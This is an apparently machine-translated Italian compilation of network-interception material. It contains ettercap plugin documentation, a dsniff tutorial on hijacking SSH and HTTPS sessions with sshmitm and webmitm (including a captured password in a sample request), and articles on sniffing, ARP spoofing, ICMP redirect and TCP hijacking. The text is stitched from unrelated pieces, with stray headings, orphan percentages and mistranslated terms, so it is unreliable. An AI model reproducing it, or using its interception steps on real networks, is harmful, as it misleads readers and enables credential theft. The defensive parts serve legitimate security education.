Controlla se qualcuno sta provocando tra noi e uno degli host nell'elenco. Innanzitutto, controlla se due host nell'elenco hanno lo stesso indirizzo MAC. Ciò potrebbe significare che uno di loro ci sta avvelenando fingendo di essere l'altro. Può generare molti falsi positivi in un ambiente arp proxy. È necessario creare un elenco di host per eseguire questo controllo. Successivamente, invia pacchetti echo icmp a ciascun host nell'elenco e controlla se l'indirizzo mac di origine della risposta è diverso dall'indirizzo che abbiamo memorizzato nell'elenco con questo IP. Ciò potrebbe significare che qualcuno sta avvelenando questo host fingendo di avere il nostro indirizzo IP e inoltrandoci i pacchetti intercettati. Non è possibile eseguire questo test attivo in modalità inoffensiva (innocua).

Ettercap -TQP scan_poisoner //

7.8 ricerca_promisc

Cerca di scoprire se qualcuno sta annusando (ascoltando) in modalità promiscua. Invia due diverse richieste arp con formato non valido a ciascuna destinazione nell'elenco degli host e attende risposte. Se la risposta proviene da un host di destinazione, è più o meno probabile che tale destinazione abbia una scheda di rete in modalità promiscua. Può generare falsi allarmi. Puoi eseguirlo dalla riga di comando o dal menu dei plugin. Poiché ascolta le risposte arp, è meglio non utilizzarle quando si inviano richieste arp.

ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Un esempio di come indovinare con successo due NIC in modalità promiscua:

Espandere

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Team di sviluppo Ettercap In ascolto su: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.255.0 fe80::a00: 27ff:feaf:30b9/64 La dissezione SSL richiede uno script "redir_command_on" valido nel file etter.conf Ettercap potrebbe non funzionare correttamente. /proc/sys/net/ipv6/conf/eth0/use_tempaddr non è impostato su 0. Privilegi scesi su EUID 65534 EGID 65534... 33 plugin 42 dissettori di protocollo 57 porte monitorate 20388 impronta digitale del fornitore mac 1766 impronta digitale del sistema operativo tcp 2182 servizi conosciuti Lua : non sono stati specificati script, non si avvia! Randomizzazione di 255 host per la scansione... Scansione dell'intera maschera di rete per 255 host... * |============================= = ===================>| 100,00 % 5 host aggiunti all'elenco degli host... Avvio di Unified sniffing... Solo testo Interfaccia attivata... Premi "h" per la guida in linea Attivazione del plugin search_promisc... search_promisc: Ricerca di NIC promisc... Meno probabilmente sniffing di NIC : - 192.168.1.36 - 192.168.1.34 Molto probabilmente NIC di sniffing: - NONE Chiusura interfaccia testo... Chiusura ettercap... Pulizia Lua completata! Lo sniffing unificato è stato interrotto.

7.9 SSLStrip

Durante l'esecuzione di un attacco SSL mitm, ettercap sostituisce il vero certificato SSL con il proprio. Viene creato al volo un certificato falso e tutti i campi vengono compilati in base al certificato reale presentato dal server.

(62%)

(56.5%)

(CASUALE - 0,2%)

In questo articolo parleremo con voi degli attacchi Man-in-the-Middle, o meglio, del metodo
reindirizzare il traffico SSH e HTTP utilizzando un attacco Man in the Middle. Non tiriamo il gatto per la coda, ma mettiamoci al lavoro.

Man in the Middle (in breve, MitM, dal russo semplicemente - "attacco dell'intermediario" o "uomo
in the middle") è un tipo di attacco basato sul reindirizzamento del traffico tra due macchine per intercettare informazioni - studiarle ulteriormente, distruggerle o modificarle. Quindi, la prima cosa di cui abbiamo bisogno è il pacchetto dsniff (vedrai un collegamento al pacchetto su alla fine dell'articolo) Perché perché questo pacchetto contiene tutte le utilità necessarie, tra cui sshmitm (reindirizzamento del traffico SSH) e httpmitm (reindirizzamento del traffico HTTP), che possono aggirare il seguente schema di sicurezza: per quanto ne sai, protocolli con crittografia dei dati sono abbastanza "sicuri" (la crittografia aiuta :)) e non consentono attacchi "al di sopra" del livello di rete. La chiave di crittografia è sconosciuta all'hacker: è impossibile decrittografare i dati e inserire anche il comando. Tutto sembra andare bene, ma ecco come
poiché i programmi di attacco MitM (sshmitm e httpmitm) del pacchetto dsniff sono in grado di aggirare questo sistema sicurezza (puoi aggirare quasi tutto). Tutto questo avviene secondo il seguente principio:
l'host intermedio riceve la richiesta dal client, "dicendogli" che si tratta del server, quindi connettendosi al server reale.
La seconda cosa di cui abbiamo bisogno sono le braccia dritte, la quarta, la cosa più importante, il desiderio e, ovviamente, una vittima, cioè un computer che attaccheremo.

Reindirizzamento del traffico SSH

Dopo aver preparato il toolkit, hai capito cosa era cosa e perché :). Ottieni sshmitm - ora reindirizzeremo il traffico SSH (tutto quello che non ho capito con la parte teorica - leggi sopra)
utilizzandolo, sfruttando le carenze dell'attuale PKI (infrastruttura a chiave pubblica - uno schema di gestione delle chiavi basato su
metodi di crittografia asimmetrica). Diamo un'occhiata alla sintassi
sshmitm:

sshmitm [-d] [-I] [-p porta] host

D
consentire l'output di debug (ovvero la modalità più avanzata)

IO
dirottamento della sessione

Porto P
porta di ascolto

ospite
l'indirizzo dell'host remoto le cui sessioni verranno intercettate

porta
porta sull'host remoto

Tutto sembra semplice e di buon gusto: non c'è niente di complicato :). Iniziamo l'attacco!

# sshmitm server.target.gov // specifica il tuo server SSH
sshmitm: inoltro al server server.target.gov

Poiché non disponiamo di una vera chiave SSH, l'interprete dei comandi viene attaccato
visualizzerà una richiesta per controllare la chiave host, sarà tutto simile a questo:

clientmachine$server.target.gov
@ATTENZIONE: L'IDENTIFICAZIONE DELL'HOST REMOTO È CAMBIATA! @
È POSSIBILE CHE QUALCUNO STIA FACENDO QUALCOSA DI BRUTTO!
Qualcuno potrebbe origliarti in questo momento (attacco man-in-the-middle)!
È anche possibile che la chiave host RSA sia stata appena modificata.
Contatta l'amministratore di sistema.

E poi l'utente deciderà se connettersi o meno. Se è così, avremo il pieno controllo sulla sessione SSH.
MA! Se l'utente non si è mai connesso a quella carriola, potrebbe essere visualizzato il seguente messaggio:

Impossibile stabilire l'autenticità dell'host "server.target.gov".
L'impronta digitale della chiave RSA è
bla:bla:bla;bla;bla........
Sei sicuro di voler continuare a connetterti (sì/no)?

Anche qui l'utente ha due scelte: connettersi o meno. Se sì, allora abbiamo intercettato la sessione, altrimenti, ahimè... :(.
In generale, l'attacco ha avuto successo se l'utente si è connesso e sshmitm, a sua volta, registra tutti i passaggi e gli accessi ed è molto leggibile 🙂
Naturalmente, questo non è l'unico session interceptor SSH, ma una volta che avrai preso confidenza con questo, padroneggerai facilmente anche l'altro 🙂

Reindirizzamento del traffico HTTP

Ora reindirizzeremo il traffico HTTP. Ancora una volta, abbiamo bisogno di uno strumento già selezionato: httpmitm, che ascolta sulle porte 80- (HTTP -) e 443- (HTTPS -), intercetta le richieste WEB, quindi si connette al server e inoltra le richieste al computer client. Il programma genera anche chiavi SSL e certificati SSL utilizzando OpenSSL. Poi dopo aver provato
si connette al sito (target.gov), il browser controllerà il certificato SSL. Poiché i certificati non corrisponderanno, il browser dell'utente avviserà
certificato SSL errato. Dal punto di vista dell'attaccante, sarebbe simile a questo:

#webmitm -d
webmitm: trasmissione trasparente
webmitm: nuova connessione da
OTTIENI [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[versione]
Tipo di connessione]
Ospite: www.target.gov
User-Agent: [informazioni sul sistema, browser]
[ecc, ecc, ecc]
Biscotto: [cookie]

Ecco come appare dall'esterno -
una connessione SSL viene intercettata, catturando dati non crittografati.

Conclusione

In questo articolo abbiamo discusso con voi del reindirizzamento del traffico SSH e HTTP utilizzando l'attacco Man in the Middle - in modo chiaro, dettagliato e breve. Altri programmi di reindirizzamento HTTP e SSH
Con l'aiuto di MitM padroneggerai rapidamente il traffico se hai padroneggiato anche questi :)). Se qualcosa non era chiaro, allora.

L'intercettazione dei dati sulla rete è la ricezione di qualsiasi informazione da un dispositivo informatico remoto. Può consistere nelle informazioni personali dell'utente, nei suoi messaggi, nei registri delle visite ai siti web. L'acquisizione dei dati può essere effettuata tramite spyware o utilizzando sniffer di rete.

Lo spyware è un software speciale in grado di registrare tutte le informazioni trasmesse in rete da una determinata postazione o dispositivo.

Uno sniffer è un programma o un'apparecchiatura informatica che intercetta e analizza il traffico che passa attraverso la rete. Lo sniffer consente di connettersi a una sessione web ed eseguire varie operazioni per conto del proprietario del computer.

Se le informazioni non vengono trasmesse in tempo reale, spyware generare report utili per visualizzare e analizzare le informazioni.

Le intercettazioni in rete possono essere organizzate legalmente o eseguite illegalmente. Il documento principale che fissa la legalità dell'acquisizione di informazioni è la Convenzione sulla criminalità informatica. È stata fondata in Ungheria nel 2001. I requisiti legali dei diversi stati possono variare leggermente, ma il significato chiave è lo stesso per tutti i paesi.

Classificazione e metodi di intercettazione dei dati in rete

In conformità a quanto sopra, l'intercettazione di informazioni sulla rete può essere divisa in due tipologie: autorizzata e non autorizzata.

L'acquisizione autorizzata dei dati viene effettuata per vari scopi, che vanno dalla protezione delle informazioni aziendali alla garanzia della sicurezza dello Stato. I motivi per eseguire tale operazione sono determinati dalla legislazione, dai servizi speciali, dalle forze dell'ordine, dagli specialisti organizzazioni amministrative e servizi di sicurezza aziendale.

Esistono standard internazionali per eseguire l'intercettazione dei dati. L'Istituto europeo per le norme sulle telecomunicazioni è riuscito a riunire in un unico standard una serie di processi tecnici (ETSI ES 201 158 "Sicurezza delle telecomunicazioni; Intercettazione legale (LI); Requisiti per le funzioni di rete"), su cui si basa l'intercettazione delle informazioni. Di conseguenza, è stata sviluppata un'architettura di sistema che aiuta gli specialisti dei servizi segreti e gli amministratori di rete a impossessarsi legalmente dei dati dalla rete. La struttura sviluppata per l'implementazione dell'intercettazione dei dati sulla rete viene utilizzata per cablato e sistemi senza fili chiamate vocali, nonché corrispondenza via posta, messaggi vocali su IP, scambio di informazioni tramite SMS.

L'intercettazione non autorizzata di dati in rete viene effettuata da intrusi che vogliono impossessarsi di dati riservati, password, segreti aziendali, indirizzi di computer in rete, ecc. Per raggiungere i loro obiettivi, gli hacker utilizzano solitamente un analizzatore del traffico di rete: uno sniffer. Questo programma oppure un dispositivo di tipo hardware-software offre al truffatore la capacità di intercettare e analizzare le informazioni all'interno della rete a cui è connesso l'utente vittima, compreso il traffico SSL crittografato attraverso la sostituzione di certificati. I dati sul traffico possono essere acquisiti in diversi modi:

in ascolto sull'interfaccia di rete,
collegare un intercettore a un'interruzione del canale,
creare un ramo di traffico e duplicarlo su uno sniffer,
conducendo un attacco.

Esistono tecnologie più sofisticate per intercettare informazioni sensibili che consentono l'intrusione nell'interazione della rete e la modifica dei dati. Una di queste tecniche sono le richieste ARP fasulle. L'essenza del metodo è lo spoofing degli indirizzi IP tra il computer della vittima e il dispositivo dell'aggressore. Un altro metodo che può essere utilizzato per intercettare i dati sulla rete è il decoy routing. Consiste nel sostituire l'indirizzo IP del router di rete con il proprio indirizzo. Se il criminale informatico sa come è organizzata la rete locale in cui si trova la vittima, può facilmente organizzare la ricezione delle informazioni dalla macchina dell'utente al suo indirizzo IP. Serve anche catturare una connessione TCP in modo efficiente intercettazione dati. Un utente malintenzionato interrompe una sessione di comunicazione generando e inviando pacchetti TCP al computer della vittima. Inoltre, la sessione di comunicazione viene ripristinata, intercettata e portata avanti dal criminale invece che dal cliente.

Oggetto di influenza

Gli oggetti dell'intercettazione dei dati sulla rete possono essere enti governativi, imprese industriali, strutture commerciali, utenti ordinari. All'interno di un'organizzazione o di un'azienda, l'acquisizione delle informazioni può essere implementata per proteggere l'infrastruttura di rete. Servizi speciali e forze dell'ordine possono effettuare intercettazioni di massa di informazioni trasmesse da diversi proprietari, a seconda del compito.

Se parliamo di criminali informatici, qualsiasi utente o organizzazione può diventare oggetto di influenza al fine di ottenere dati trasmessi sulla rete. Con l'accesso autorizzato è importante la parte informativa delle informazioni ottenute, mentre all'attaccante sono più interessati i dati di cui prenderne possesso in contanti o informazioni preziose per la sua successiva vendita.

Molto spesso, le vittime dell'intercettazione di informazioni da parte dei criminali informatici sono gli utenti che si connettono a una rete pubblica, ad esempio in un bar con il punto Accesso Wi-Fi. Un utente malintenzionato si connette a una sessione Web utilizzando uno sniffer, sostituisce i dati e ruba informazioni personali. Maggiori dettagli su come ciò accade sono descritti nell'articolo.

Fonte della minaccia

L'intercettazione autorizzata di informazioni nelle aziende e negli enti viene effettuata dagli operatori delle infrastrutture della rete pubblica. Le loro attività sono finalizzate alla protezione dei dati personali, dei segreti commerciali e altro Informazioni importanti. Per motivi legali, il trasferimento di messaggi e file può essere monitorato da servizi speciali, forze dell'ordine e vari enti governativi per garantire la sicurezza dei cittadini e dello Stato.

Gli aggressori sono coinvolti nell'intercettazione illegale di dati. Per non diventare vittima di un criminale informatico, è necessario seguire alcuni consigli degli esperti. Ad esempio, non si dovrebbero eseguire operazioni che richiedono l'autorizzazione e il trasferimento di dati sensibili nei luoghi in cui viene effettuata la connessione a reti pubbliche. È più sicuro scegliere reti crittografate e, ancora meglio, utilizzare modem 3G e LTE personali. Quando si trasferiscono dati personali, si consiglia di crittografarli utilizzando il protocollo HTTPS o un tunnel VPN personale.

Puoi proteggere il tuo computer dall'intercettazione del traffico di rete utilizzando crittografia, anti-sniffer; l'accesso remoto piuttosto che l'accesso alla rete wireless mitigherà i rischi.

Questa lezione descrive le tecnologie di hacking di rete basate sull'intercettazione di pacchetti di rete. Gli hacker utilizzano tali tecnologie per annusare il traffico di rete al fine di rubare informazioni preziose, per intercettare dati allo scopo di un attacco man-in-the-middle, per intercettare connessioni TCP, consentendo, ad esempio, lo spoofing di dati e per eseguire altre altrettanto azioni interessanti. Sfortunatamente, la maggior parte di questi attacchi nella pratica vengono implementati solo per le reti Unix, per le quali gli hacker possono utilizzarle entrambe utilità speciali e strumenti di sistema Unix. Le reti Windows sembrano essere aggirate dagli hacker e siamo costretti a limitare la nostra descrizione degli strumenti di intercettazione dei dati ai programmi sniffer progettati per lo sniffing banale dei pacchetti di rete. Tuttavia, soprattutto per gli anti-hacker, non si dovrebbe trascurare almeno una descrizione teorica di tali attacchi, poiché la conoscenza delle tecnologie di hacking utilizzate aiuterà a prevenire molti problemi.

Sniffing della rete

Per lo sniffing vengono comunemente utilizzate le reti Ethernet schede di rete mettere in modalità ascolto. Ascoltando Reti Ethernet richiede la connessione di un computer che esegue un programma sniffer a un segmento di rete, dopodiché l'hacker ha accesso a tutto il traffico di rete inviato e ricevuto dai computer in questo segmento di rete. È ancora più semplice intercettare il traffico delle reti radio utilizzando intermediari di reti wireless: in questo caso non è nemmeno necessario cercare un posto dove connettersi al cavo. Oppure un utente malintenzionato può connettersi alla linea telefonica collegando il computer al server Internet, trovando un posto conveniente per questo (le linee telefoniche vengono solitamente posate negli scantinati e in altri luoghi non protetti).

Per dimostrare la tecnologia di sniffing, utilizzeremo il famosissimo programma sniffer SpyNet, che può essere trovato su molti siti Web. Il sito Web ufficiale del programma SpyNet si trova all'indirizzo http://members.xoom.com/layrentiu2/, dove è possibile scaricare una versione demo del programma.

Il programma SpyNet è costituito da due componenti: CaptureNet e PipeNet. Il programma CaptureNet consente di acquisire i pacchetti trasmessi su una rete Ethernet a livello di rete, ad es. come frame Ethernet. Il programma PipeNet consente di raccogliere frame Ethernet in pacchetti a livello di applicazione, recuperando, ad esempio, messaggi E-mail, messaggi del protocollo HTTP (scambio di informazioni con un server Web) ed eseguire altre funzioni.

Sfortunatamente, nella demo di SpyNet, le capacità di PipeNet sono limitate alla demo di creazione del pacchetto HTTP, quindi non saremo in grado di dimostrare SpyNet nella sua interezza. Tuttavia, dimostreremo di passaggio le capacità dello sniffing della rete SpyNet utilizzando la nostra rete sperimentale come esempio file di testo dall'host Sword-2000 all'host Alex-3 utilizzando il solito Windows Explorer. Contemporaneamente, sul computer A1ex-1, eseguiremo il programma CaptureNet, che intercetterà i pacchetti trasmessi e ci permetterà di leggere il contenuto del file trasferito in frame Ethernet. Nella fig. 1 mostra il testo del messaggio segreto nel file secret.txt ; proveremo a trovare questo testo nei frame Ethernet intercettati.

Riso. 1. Il testo del messaggio segreto nella finestra Blocco note

Seguire questi passaggi per acquisire frame Ethernet.

Sul computer Alex-3, avviare il programma CaptureNet. Nella finestra di lavoro visualizzata del programma, seleziona il comando di menu Cattura * Avvia (Capture * Start) e avvia il processo di intercettazione dei frame di rete.

Utilizzando Esplora risorse, copiare il file security.txt dal computer Sword-2000 all'A1ex-3.

Dopo aver trasferito il file secret.txt, seleziona il comando di menu Cattura * Interrompi e interrompi il processo di cattura.

I frame Ethernet catturati verranno visualizzati sul lato destro della finestra di lavoro di CaptureNet (Figura 2), con ciascuna riga nell'elenco superiore che rappresenta un frame Ethernet, e sotto l'elenco verrà visualizzato il contenuto del frame selezionato.

Riso. 2. Il frame Ethernet contiene il testo del messaggio segreto

Scorrendo l'elenco dei fotogrammi intercettati, possiamo facilmente trovare quello che contiene il testo che abbiamo trasmesso Questo è un segreto molto grande (This is a very big secret).

Sottolineiamo che questo è l'esempio più semplice in cui è stato registrato tutto il traffico di rete intercettato. Il programma CaptureNet consente di acquisire pacchetti inviati su determinati protocolli e a determinate porte host, selezionare messaggi con determinati contenuti e accumulare i dati catturati in un file. La tecnica per eseguire tali azioni è semplice e puoi apprenderla dal sistema di aiuto del programma SpyNet.

Oltre all'ascolto primitivo sulla rete, gli hacker hanno a disposizione mezzi più sofisticati per intercettare i dati. Di seguito viene fornita una breve panoramica di tali metodi, sotto l'aspetto però teorico. Il motivo è che per le reti Windows l’implementazione pratica degli attacchi di intercettazione dei dati è estremamente limitata e l’insieme di strumenti affidabili per gli attacchi di intercettazione è piuttosto scarso.

Metodi per intercettare il traffico di rete

Ascoltare la rete con programmi di sniffer di rete come CaptureNet sopra è il primo modo più semplice per intercettare i dati. Oltre a SpyNet, lo sniffing di rete utilizza molti strumenti originariamente sviluppati allo scopo di analizzare l'attività di rete, diagnosticare le reti, selezionare il traffico in base a criteri specifici e altre attività di amministrazione di rete. Un esempio di tale programma è tcpdump (http://www.tcpdump.org), che consente di scrivere il traffico di rete in un registro speciale per un'analisi successiva.

Per proteggersi dalle intercettazioni di rete, vengono utilizzati programmi speciali, ad esempio AntiSniff (http://www.securitysoftwaretech.com/antisniff), che sono in grado di rilevare i computer sulla rete che ascoltano il traffico di rete. Per risolvere i loro problemi, i programmi anti-sniffer utilizzano un segno speciale della presenza di dispositivi di ascolto sulla rete: la scheda di rete del computer sniffer deve trovarsi in una modalità di ascolto speciale. In modalità di ascolto, i computer in rete rispondono in modo particolare ai datagrammi IP inviati all'host sottoposto a test. Ad esempio, gli host in ascolto in genere elaborano tutto il traffico in entrata, non solo i datagrammi inviati all'indirizzo host. Esistono altri segni di comportamento sospetto dell'host che AntiSniff può riconoscere.

Richieste ARP false

Per intercettare e riprodurre in loop il processo di comunicazione di rete tra due host A e B, un utente malintenzionato può sostituire gli indirizzi IP degli host interagenti con il proprio indirizzo IP inviando falsi messaggi ARP (Address Revolution Protocol) agli host A e B . Il protocollo ARP è reperibile nell'Appendice D, che descrive come risolvere (tradurre) l'indirizzo IP di un host in un indirizzo macchina (indirizzo MAC) cablato nella scheda NIC dell'host. Vediamo come un hacker può utilizzare il protocollo ARP per intercettare la comunicazione di rete tra gli host A e B.

Un utente malintenzionato determina gli indirizzi MAC degli host A e B, ad esempio, utilizzando il comando nbtstat del pacchetto W2RK.

Agli indirizzi MAC identificati degli host A e B l'aggressore invia messaggi che sono risposte ARP falsificate alle richieste di risolvere gli indirizzi IP degli host negli indirizzi MAC dei computer. All'host A viene detto che l'indirizzo IP dell'host B corrisponde all'indirizzo MAC del computer dell'aggressore; all'host B viene detto che l'indirizzo IP dell'host A corrisponde anche all'indirizzo MAC del computer dell'aggressore.

Gli host A e B inseriscono gli indirizzi MAC ricevuti nelle rispettive cache ARP e quindi li utilizzano per scambiarsi messaggi. Poiché gli indirizzi IP A e B corrispondono all'indirizzo MAC del computer dell'aggressore, gli host A e B, ignari di nulla, comunicano tramite un intermediario capace di fare quello che vogliono con i loro messaggi.

Per proteggersi da tali attacchi, gli amministratori di rete devono mantenere un database con una tabella di mappatura tra gli indirizzi MAC e gli indirizzi IP dei loro computer di rete. Successivamente, utilizzando uno speciale Software, ad esempio, l'utilità arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) può periodicamente scansionare la rete per individuare incoerenze.

Sulle reti UNIX, questo tipo di attacco ARP di spoofing può essere implementato utilizzando le utilità di monitoraggio e controllo del traffico di rete del sistema, come arpredirect . Sfortunatamente, le reti Windows 2000/XP non sembrano implementare utilità così affidabili. Ad esempio, sul sito Web di NTsecurity (http://www.ntsecurity.nu) è possibile scaricare l'utilità GrabitAII, che viene presentata come uno strumento per reindirizzare il traffico tra host di rete. Tuttavia, un controllo elementare delle prestazioni dell'utilità GrabitAII mostra che è ancora lontana dal completo successo nell'implementazione delle sue funzioni.

Instradamento falso

Per eseguire il decoy routing, l'attaccante deve conoscere alcuni dettagli sull'organizzazione della rete locale in cui si trova l'host A, in particolare l'indirizzo IP del router attraverso il quale viene inviato il traffico dall'host A a B. Sapendo questo, l'attaccante formerà un datagramma IP in cui IP - L'indirizzo di origine è specificato come indirizzo IP del router e la destinazione è l'host A. Nel datagramma è incluso anche un messaggio di reindirizzamento ICMP con il campo dell'indirizzo del nuovo router impostato sull'indirizzo IP del computer dell'aggressore. Dopo aver ricevuto un messaggio del genere, l'host A invierà tutti i messaggi all'indirizzo IP del computer dell'aggressore.

L'implementazione pratica di tutti i metodi crittografici di protezione dello scambio di informazioni descritti nel capitolo 4 è fornita dalle VPN (Virtual Private Networks - Virtual Private Networks). Una breve panoramica dei principi e dei metodi di protezione crittografica è disponibile nell'Appendice E, e descrizione dettagliata protezione crittografica fornita da PGP Desktop Security (http://www.pgp.com).

Intercettazione della connessione TCP

Sono state create diverse utilità efficaci per eseguire attacchi di dirottamento TCP, ma sono tutte implementate per la piattaforma Unix e queste utilità sono disponibili sui siti Web solo sotto forma di codice sorgente. Pertanto, noi, come convinti praticanti della nobile causa dell'hacking, non abbiamo molta utilità per gli attacchi intercettando una connessione TCP. (I dilettanti per comprendere il codice del programma di qualcun altro possono fare riferimento al sito http://www.cri.cz/~kra/index.html, dove è possibile scaricare fonte nota utility di intercettazione delle connessioni TCP Hunt di Pavel Krauz).

Nonostante la mancanza di strumenti pratici, non possiamo ignorare un argomento così interessante come l’intercettazione delle connessioni TCP e soffermarci su alcuni aspetti di tali attacchi. Alcune informazioni sulla struttura di un pacchetto TCP e su come vengono stabilite le connessioni TCP sono fornite nell'Appendice D di questo libro, ma qui ci concentreremo sulla domanda: cosa consente esattamente agli hacker di eseguire attacchi di intercettazione della connessione TCP? Consideriamo questo argomento in modo più dettagliato, basandoci principalmente sulla discussione in e.

TCP (Transmission Control Protocol) è uno dei protocolli di base del livello di trasporto OSI che consente di stabilire connessioni logiche su un canale di comunicazione virtuale. Su questo canale i pacchetti vengono trasmessi e ricevuti con la registrazione della loro sequenza, il flusso dei pacchetti viene controllato, viene organizzata la ritrasmissione dei pacchetti distorti e alla fine della sessione il canale di comunicazione viene interrotto. Il protocollo TCP è l'unico protocollo principale della famiglia TCP/IP dotato di un sistema avanzato di identificazione dei messaggi e delle connessioni.

Per identificare un pacchetto TCP, sono presenti due identificatori a 32 bit nell'intestazione TCP, che svolgono anche il ruolo di contatore di pacchetti, chiamati numero di sequenza e numero di riconoscimento. Saremo interessati anche ad un altro campo del pacchetto TCP, chiamato bit di controllo. Questo campo a 6 bit include i seguenti bit di controllo (in ordine da sinistra a destra):

URG - flag urgente;

ACK - flag di conferma;

PSH: porta bandiera;

RST - flag di ripristino della connessione;

SYN - flag di sincronizzazione;

FIN - flag di terminazione della connessione.

Considera la procedura per creare una connessione TCP.

1. Se l'host A deve stabilire una connessione TCP con l'host B, l'host A invia il seguente messaggio all'host B:

A -> B: SYN, ISSa

Ciò significa che il messaggio inviato dall'host A ha il flag SYN (Synchronize sequence number) impostato e il campo del numero di sequenza è impostato sull'ISSa (Initial Sequence Number) iniziale a 32 bit.

2. In risposta alla richiesta ricevuta dall'host A, l'host B risponde con un messaggio con il bit SYN impostato e il bit ACK impostato. Nel campo del numero di sequenza, l'host B imposta il suo valore contatore iniziale, ISSb; il campo del numero di riconoscimento conterrà quindi il valore ISSa ricevuto nel primo pacchetto dall'host A più uno. Quindi l'host B risponde con questo messaggio:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Infine, l'host A invia un messaggio all'host B in cui: è impostato il bit ACK; il campo del numero di serie contiene il valore ISSa + 1 ; il campo del numero di riconoscimento contiene il valore ISSb + 1 . Successivamente, la connessione TCP tra gli host A e B è considerata stabilita:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. L'host A può ora inviare pacchetti di dati all'host B sul canale virtuale TCP appena creato:

A -> B: ACK, ISSa+1, ACK(ISSb+1); DATI

Qui DATA sta per dati.

Dall'algoritmo per la creazione di una connessione TCP discusso sopra, si può vedere che gli unici identificatori degli abbonati TCP e di una connessione TCP sono due numeri di sequenza a 32 bit e parametri del numero di riconoscimento: ISSa e ISSb . Pertanto, se un hacker riesce a scoprire i valori attuali dei campi ISSa e ISSb, nulla gli impedirà di generare un pacchetto TCP falsificato. Ciò significa che è sufficiente che un hacker raccolga i valori attuali dei parametri ISSa e ISSb di un pacchetto TCP per una determinata connessione TCP, invii un pacchetto da qualsiasi host Internet per conto di un client di questa connessione TCP, e questo pacchetto sarà accettato come valido!

Il pericolo di tale spoofing di pacchetti TCP è importante anche perché i protocolli FTP e TELNET di alto livello vengono implementati sulla base del protocollo TCP e l'identificazione dei client FTP e dei pacchetti TELNET si basa interamente sul protocollo TCP.

Inoltre, poiché i protocolli FTP e TELNET non controllano gli indirizzi IP dei mittenti dei messaggi, dopo aver ricevuto un pacchetto contraffatto, i server FTP o TELNET invieranno un messaggio di risposta all'indirizzo IP dell'host hacker specificato nel pacchetto contraffatto. Successivamente, l'host hacker inizierà a lavorare con il server FTP o TELNET dal suo indirizzo IP, ma con i diritti di un utente legalmente connesso, che, a sua volta, perderà la connessione con il server a causa della mancata corrispondenza del contatore.

Pertanto, per effettuare l'attacco sopra descritto, condizione necessaria e sufficiente è la conoscenza dei due parametri attuali a 32 bit ISSa e ISSb, che identificano una connessione TCP. Prendere in considerazione modi possibili ricevendoli. Nel caso in cui un host hacker sia connesso al segmento di rete attaccato, il compito di ottenere i valori ISSa e ISSb è banale e viene risolto analizzando il traffico di rete. Occorre quindi avere ben chiaro che il protocollo TCP consente, in linea di principio, di proteggere la connessione solo nel caso in cui sia impossibile per l'attaccante intercettare i messaggi trasmessi su questa connessione, cioè solo se l'host dell'hacker è connesso a un segmento di rete diverso dal segmento dell'abbonato della connessione TCP.

Pertanto, gli attacchi intersegmento sono di grande interesse per un hacker quando l'aggressore e il suo obiettivo si trovano in segmenti di rete diversi. In questo caso, il compito di ottenere i valori di ISSa e ISSb non è banale. Per risolvere questo problema finora sono stati inventati solo due metodi.

Previsione matematica del valore iniziale dei parametri di connessione TCP mediante estrapolazione dei valori precedenti di ISSa e ISSb.

Sfruttamento delle vulnerabilità nell'identificazione degli abbonati alla connessione TCP sui server Unix rsh.

Il primo compito è risolto da studi approfonditi sull'implementazione del protocollo TCP in vari sistemi operativi ed è ora puramente teorico. Il secondo problema viene risolto utilizzando le vulnerabilità Sistemi Unix identificando gli host attendibili. (Un host attendibile A è un host di rete B il cui utente può connettersi all'host A senza autenticazione utilizzando il servizio r dell'host A). Manipolando i parametri dei pacchetti TCP, un hacker può tentare di impersonare un host fidato e intercettare una connessione TCP con l'host attaccato.

Tutto ciò è molto interessante, ma i risultati pratici di questo tipo di ricerca non sono ancora visibili. Consigliamo pertanto a tutti coloro che desiderano approfondire questo argomento di fare riferimento al libro, da dove, in generale, sono state prese le informazioni di cui sopra.

Conclusione

L'intercettazione di rete è la tecnica di hacking di rete più efficace, poiché consente a un hacker di ottenere praticamente tutte le informazioni che circolano su una rete. Gli strumenti di sniffing hanno ricevuto il massimo sviluppo pratico, ad es. ascolto delle reti; tuttavia, non dovremmo ignorare i metodi di intercettazione dei dati di rete, eseguiti interferendo con il normale funzionamento della rete al fine di reindirizzare il traffico verso un host hacker, in particolare i metodi di intercettazione delle connessioni TCP. Tuttavia, in pratica, questi ultimi metodi non hanno ancora ricevuto uno sviluppo sufficiente e necessitano di essere migliorati.

Un anti-hacker dovrebbe sapere che l'unico modo per impedire l'intercettazione dei dati è crittografarli, ovvero metodi crittografici di protezione. Quando si invia un messaggio sulla rete, è necessario presupporre in anticipo che il sistema di cavi della rete sia assolutamente vulnerabile e che qualsiasi hacker che si connette alla rete sarà in grado di catturare tutti i messaggi segreti trasmessi da essa. Esistono due tecnologie per risolvere questo problema: creare una rete VPN e crittografare i messaggi stessi. Tutte queste attività sono molto facili da risolvere utilizzando il pacchetto software PGP Desktop Security (la sua descrizione può essere trovata, ad esempio, in).

Popolare nella categoria: